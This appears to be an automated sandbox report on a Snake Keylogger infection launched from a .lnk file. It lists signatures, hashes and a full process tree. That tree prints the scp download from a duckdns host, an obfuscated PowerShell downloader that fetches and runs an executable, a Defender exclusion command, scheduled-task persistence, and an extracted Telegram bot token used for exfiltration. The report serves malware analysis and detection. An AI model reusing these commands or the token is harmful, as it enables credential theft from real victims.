Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
-
submitted
03-10-2023 09:57
General
-
Target
QP0990001.lnk
-
Size
2KB
-
MD5
c23a4b2e392af2535198428aafcbc7a4
-
SHA1
02a472fb5f6be33044c51420b6fa98fe3adf6251
-
SHA256
81b9e6ecd9d94421b7bef50c53e109e15927b3fdfb5068f51a742b662a7deaad
-
SHA512
17172ade2ef629d2b878635015a6bcbc73464737b51fc7312b1b6ffc76ea238a568bae3f479c8e2f5ef775404681d731c8217cdb6249fad8a5db98902ea00747
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot6678785785:AAE948y1Spb4BUdVN86G6De5C3QmbuoXvWc/sendMessage?chat_id=6445748530
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 29 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\QP0990001.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "scp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta" & C:\Users\Admin\AppData\Roaming\eeMT.hta2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\OpenSSH\scp.exescp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\OpenSSH\ssh.exe"C:\Windows\System32\OpenSSH\ssh.exe" -x -oForwardAgent=no -oPermitLocalCommand=no -oClearAllForwardings=yes -oRemoteCommand=none -oRequestTTY=no -o StrictHostKeyChecking=no -l aa -- hta4lyfeohyea.duckdns.org "scp -f /aa/DZZ"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\eeMT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mVisUpqit($j, $Xl){[IO.File]::WriteAllBytes($j, $Xl)};function YAnYyojob($j){if($j.EndsWith((vNhoq @(53343,53397,53405,53405))) -eq $True){Start-Process (vNhoq @(53411,53414,53407,53397,53405,53405,53348,53347,53343,53398,53417,53398)) $j}else{Start-Process $j}};function wxsxZbvJk($w){$de = New-Object (vNhoq @(53375,53398,53413,53343,53384,53398,53395,53364,53405,53402,53398,53407,53413));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Xl = $de.DownloadData($w);return $Xl};function vNhoq($aw){$fl=53297;$m=$Null;foreach($b in $aw){$m+=[char]($b-$fl)};return $m};function ajEwZvwJ(){$TaaVVi = $env:APPDATA + '\';$xyRHLrvhS = wxsxZbvJk (vNhoq @(53329,53401,53413,53413,53409,53355,53344,53344,53346,53352,53354,53343,53349,53348,53343,53346,53352,53351,53343,53349,53347,53344,53404,53414,53396,53402,53344,53407,53346,53415,53409,53401,53400,53397,53408,53419,53385,53408,53354,53406,53350,53415,53343,53398,53417,53398));$FfTiWLO = $TaaVVi + 'n1vphgdozXo9m5v.exe';mVisUpqit $FfTiWLO $xyRHLrvhS;YAnYyojob $FfTiWLO;;;;}ajEwZvwJ;4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\XTAxVe.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XTAxVe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp42E0.tmp"6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"C:\Users\Admin\AppData\Roaming\n1vphgdozXo9m5v.exe"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
17KB
MD5822205fa3d87c6335be84ff8c2d95719
SHA17f78d4d82da074a883d6315da971d0c92c071b59
SHA2566ad955a572b0dced5f279fbaea5c16017e73b3c1d192f552e6d682c5db0bdcbe
SHA51281659ec78b6f5eb9042f5c4807fdbae8c913575e4e02317f61ed3b92f2b0adc84f13e9fd1a30406ee3d854b9f0a90f30ffb1af7b59247a1ceec222bd69a4b2e0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5e793d996cd78536f6e2bd166deea37f4
SHA1f64f5da591d0235ef9aefbd0dd48969f55888dc7
SHA2569adeea6ead55b06fb2669fef5980ef63796449fe00e37d9743ccaf1da5fbf8ea
SHA512bc6ca708502e4816d346e11a3da534c1f89ee006e69d0947332099cecfa53a2f247e127a07b0988344072ab89aae93eec849691099a31fe6a05e6aed0d6080b1
-
Filesize
48KB
MD52b49ac452f8ef311f2c8919d1b6cd628
SHA1d06d4a5d04e6e5d360f2cb6680807aa4dd7c0aa1
SHA256b488e09cd83462e24bc730f783718b396eba8ac909a4acc8a725127b3393d7f5
SHA51221c716579bde4e6ae03944e67da3e6bdda279f81bbe0a891d9603dbe6d96ce6571b6495d2331f63403d47599c0a3911e24da7e9f2593a36cefeb58d74844e127
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5
-
Filesize
488KB
MD5b06685857805dd70dc10d2bb46f3d31c
SHA16e5bda91220b0548c92c899db8fa162edec30826
SHA2566ec34fe81f76048d8e8c35bba41cedc7135db9e45b011a9d79e0ddfb85dd9034
SHA5127246e806872fd4cb6a3cf8f98911c0b9aac6c1a01f2d3aa73c7d2140e48d2d14790de9a83839a080def23ddc87a3aa717d301937ca90db7f6f5e2e6a84119bc5
-
Filesize
1.8MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
144KB
-
Filesize
320KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
384KB
-
Filesize
512KB
-
Filesize
7.7MB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
624KB
-
Filesize
72KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
48KB
-
Filesize
136KB
-
Filesize
3.3MB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
5.6MB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
200KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB